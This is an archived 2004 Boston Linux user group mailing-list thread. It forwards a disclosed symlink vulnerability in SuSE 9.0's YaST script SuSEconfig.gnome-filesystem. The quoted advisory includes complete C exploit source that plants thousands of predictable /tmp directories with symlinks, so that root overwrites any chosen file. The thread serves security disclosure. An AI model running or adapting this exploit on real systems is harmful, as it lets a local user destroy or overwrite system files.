BLU Discuss list archive

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem

Subject: SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
From: gaf at blu.org (Jerry Feldman)
Date: Wed, 14 Jan 2004 08:43:19 -0500
In-reply-to: <4004933E.6030109@comcast.net>
References: <4004933E.6030109@comcast.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Have you posted this to the SuSE-e listserv. 

On Tue, 13 Jan 2004 19:54:22 -0500
"D.E. Chadbourne" <235u at comcast.net> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> hi, don't know how vulnerable this may make somebody, but since some
> of you guys are into suse thought i would pass it along.  -eric.
> 
> ~ Author: l0om <l0om at excluded.org>
> ~ Date: 12.01.2004
> ~ page: www.excluded.org
> 
> ~ SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
> 
> ~ There is a symlink problem in the
> SuSEconfig.gnome-filesystem
> ~ scribt. a normal user can creat and overwrite every
> file
> ~ on the system. This script gets executed after a
> configuration change by the
> setup tool YaST. So if you have installed gnome or
> parts of gnome check this out.
> 
> 
> ~ When this scribt gets executed by YaST after a
> ~ configuration change it does the following:
> 
> ~ TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
> ~ mkdir $TEMP
> ~ touch $TEMP/list
> ~ [...]
> ~ echo >$TEMP/found
> ~ [...]
> 
> ~ the env variable $RANDOM includes a random number.
> in my tests
> ~ this number goes up from 1 to 33000. But also if it
> goes up to
> ~ 65535 it is still vul. to a symlink attack. this is
> nearly as
> ~ bad as the symlink problem which has been found on
> SuSE 8.2.
> ~ On 8.2 a SuSEconf scribt has created a link with the
> $$ at the
> ~ file end.
> 
> ~ I have used a little exploit written in C which
> creats the
> ~ directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1"
> up to
> ~ 33000. in every directory i have created a symlink
> to a file
> ~ which i want to creat or to overwrite. as the
> filename i have
> ~ taken the $TEMP/found and let it point to some file.
> in my test i
> ~ have taken the /etc/nologin- and hey- it has worked!
> 
> ~ have phun!
> 
> 
> *******************************************************************/
> 
> ~ #include <stdio.h>
> ~ #include <unistd.h>
> ~ #include <string.h>
> 
> ~ #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
> ~ #define START 1
> ~ #define END 33000
> 
> ~ int main(int argc, char **argv)
> ~ {
> ~ int i;
> ~ char buf[150];
> 
> ~ printf("\tSuSE 9.0 YaST script
> SuSEconfig.gnome-filesystem exploit\n");
> ~
> printf("\t-----------------------------------------------------------
> --\n");
> ~ printf("\tdiscovered and written by l0om
> <l0om at excluded.org>\n");
> ~ printf("\t WWW.EXCLUDED.ORG\n\n");
> 
> ~ if(argc != 2) {
> ~ printf("usage: %s <destination-file>\n",argv[0]);
> ~ exit(0xff);
> ~ }
> 
> ~ printf("### hit enter to create or overwrite file %
> s: ",argv[1]); fflush(stdout);
> ~ read(1, buf, 1); fflush(stdin);
> 
> ~ umask(0000);
> ~ printf("working\n\n");
> ~ for(i = START; i < END; i++) {
> ~ snprintf(buf, sizeof(buf),"%s%d",PATH,i);
> ~ if(mkdir(buf,00777) == -1) {
> ~ fprintf(stderr, "cannot creat directory [Nr.%d]
> \n",i);
> ~ exit(0xff);
> ~ }
> ~ if(!(i%1000))printf(".");
> ~ strcat(buf, "/found");
> ~ if(symlink(argv[1], buf) == -1) {
> ~ fprintf(stderr, "cannot creat symlink from %s to %s
> [Nr.%d]\n",buf,argv[1],i);
> ~ exit(0xff);
> ~ }
> ~ }
> ~ printf("\ndone!\n");
> ~ printf("next time the SuSE.gnome-filesystem script
> gets executed\n");
> ~ printf("we will create or overwrite file %s
> \n",argv[1]);
> ~ return(0x00);
> ~ }  /* i cant wait for the new gobbles comic!! */
> 
> - --
> Please avoid sending me Word or PowerPoint attachments.
> Plain text or OpenOffice.org attachments only.  Thanks.
> See http://www.fsf.org/philosophy/no-word-attachments.html
> SHAMELESS SELF PROMOTION at http://home.comcast.net/~235u/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.1 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
> 
> iD8DBQFABJM9LlZzXRl+JnERArwrAKDuVnDFvR6qT/byIEIEl99x2bz0QQCgw6dM
> QFWEE8VC5InGdDRUjhDUDfk=
> =EKUw
> -----END PGP SIGNATURE-----
> 
> _______________________________________________
> Discuss mailing list
> Discuss at blu.org
> http://www.blu.org/mailman/listinfo/discuss
> 


- -- 
Jerry Feldman <gaf at blu.org>
Boston Linux and Unix user group
http://www.blu.org PGP key id:C5061EA9
PGP Key fingerprint:053C 73EC 3AC1 5C44 3E14 9245 FB00 3ED5 C506 1EA9
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2-rc1-SuSE (GNU/Linux)

iD8DBQFABUd3+wA+1cUGHqkRAn+VAJ9TqDYjmK04mlxKIvGmqvxP23cGFQCdEl2+
sRtxqmIN8tlDiXTBWRFPQws=
=qg4g
-----END PGP SIGNATURE-----

References:
- SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
  - From: 235u at comcast.net (D.E. Chadbourne)

Prev by Date: MySQL upgrades with enterprise features
Next by Date: fetchmail
Previous by thread: SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
Next by thread: MySQL upgrades with enterprise features
Index(es):
- Date
- Thread


BLU is a member of BostonUserGroups
We also thank MIT for the use of their facilities.

Boston Linux & Unix / webmaster@blu.org